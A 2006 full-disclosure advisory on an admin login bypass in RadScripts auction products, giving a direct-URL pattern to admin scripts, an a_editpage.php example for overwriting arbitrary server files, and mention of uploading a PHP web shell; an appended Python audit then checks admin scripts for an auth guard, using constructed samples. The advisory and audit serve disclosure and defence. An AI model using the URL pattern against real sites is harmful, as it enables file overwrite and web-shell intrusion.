Date: Mon, 24 Jul 2006 14:03:34 +0700
From: "Duke" <vuln.invent@...il.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: RadBids Gold, RadLance Gold, RadNics Gold auction products: Admin bypass vulnerability

Products: RadBids Gold, RadLance Gold, RadNics Gold auction products

Vendor: RadScripts

URL: http://www.radscripts.com/

VULNERABILITY CLASS: Admin login bypass

[Product Description]

RadBids was designed to give you all the tools needed to rapidly deploy an ebay style auction web site solution. Our php auction software is simple to deploy and easy to manage. From a web-based administrative panel one can manage all aspects of the auction software including categories, users, financial transactions and every aspect of the auction software with a few clicks of the mouse.

[Summary]

An attacker can exploit RadScripts Auction Software admin login by entering the direct URL to admin scripts.

[Exploit]

http://target.xxx/[product_home]/admin/a_[admin_action_file]

For example:
http://target.xxx/[product_home]/admin/a_editpage.php?filename=[arbitrary_file]

This can be used to overwrite any file on the server which has write permissions on it.
For example, to upload one's own PHP web shell.

[Credits]

INVENT
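
Added example, not part of the original post and not vendor code: because the advisory reports that each `admin/a_*` script answers a direct request, this Python audit checks that every such script loads a session check before it touches request input or writes a file. The guard file name `auth_guard.php` is a hypothetical assumption, the sample scripts are constructed, and the scan is a text heuristic rather than a PHP parser.

```python
import re, tempfile
from pathlib import Path

# Assumption: every admin page is expected to load a shared session check
# called auth_guard.php (hypothetical name; the advisory names no such file).
# Only require/require_once count: a failed include would let the page run on.
GUARD = re.compile(r"\brequire(?:_once)?\b[\s(]*['\"][^'\"]*auth_guard\.php['\"]")
# Request input and file writes that must never be reached before the guard.
SENSITIVE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
                       r"|\b(?:fopen|fwrite|file_put_contents|move_uploaded_file)\s*\(")
COMMENTS = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)

def audit_script(source):
    """Return None when the guard precedes all sensitive code, else a reason."""
    code = COMMENTS.sub("", source)   # a commented-out require must not count
    guard = GUARD.search(code)
    if guard is None:
        return "no auth guard"
    first = SENSITIVE.search(code)
    if first and first.start() < guard.start():
        return "sensitive code before guard"
    return None

def audit_admin_dir(admin_dir):
    """Map each a_*.php file under admin_dir that fails the audit to its reason."""
    findings = {}
    for path in sorted(Path(admin_dir).glob("a_*.php")):
        reason = audit_script(path.read_text(errors="replace"))
        if reason:
            findings[path.name] = reason
    return findings

# Constructed sample scripts, not taken from the affected products.
SAMPLES = {
    "a_guarded.php": "<?php\nrequire_once 'auth_guard.php';\n$f = $_POST['filename'];\n",
    "a_open.php": "<?php\n// require 'auth_guard.php';\n$f = $_GET['filename'];\n",
    "a_late.php": "<?php\n$fh = fopen($_GET['filename'], 'w');\nrequire 'auth_guard.php';\n",
}

def run_demo():
    """Write the constructed samples to a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLES.items():
            Path(tmp, name).write_text(body)
        return audit_admin_dir(tmp)

if __name__ == "__main__":
    for name, reason in run_demo().items():
        print(f"{name}: {reason}")
```

A clean result only shows that the guard is loaded first; whether the guard itself rejects unauthenticated sessions still has to be reviewed separately.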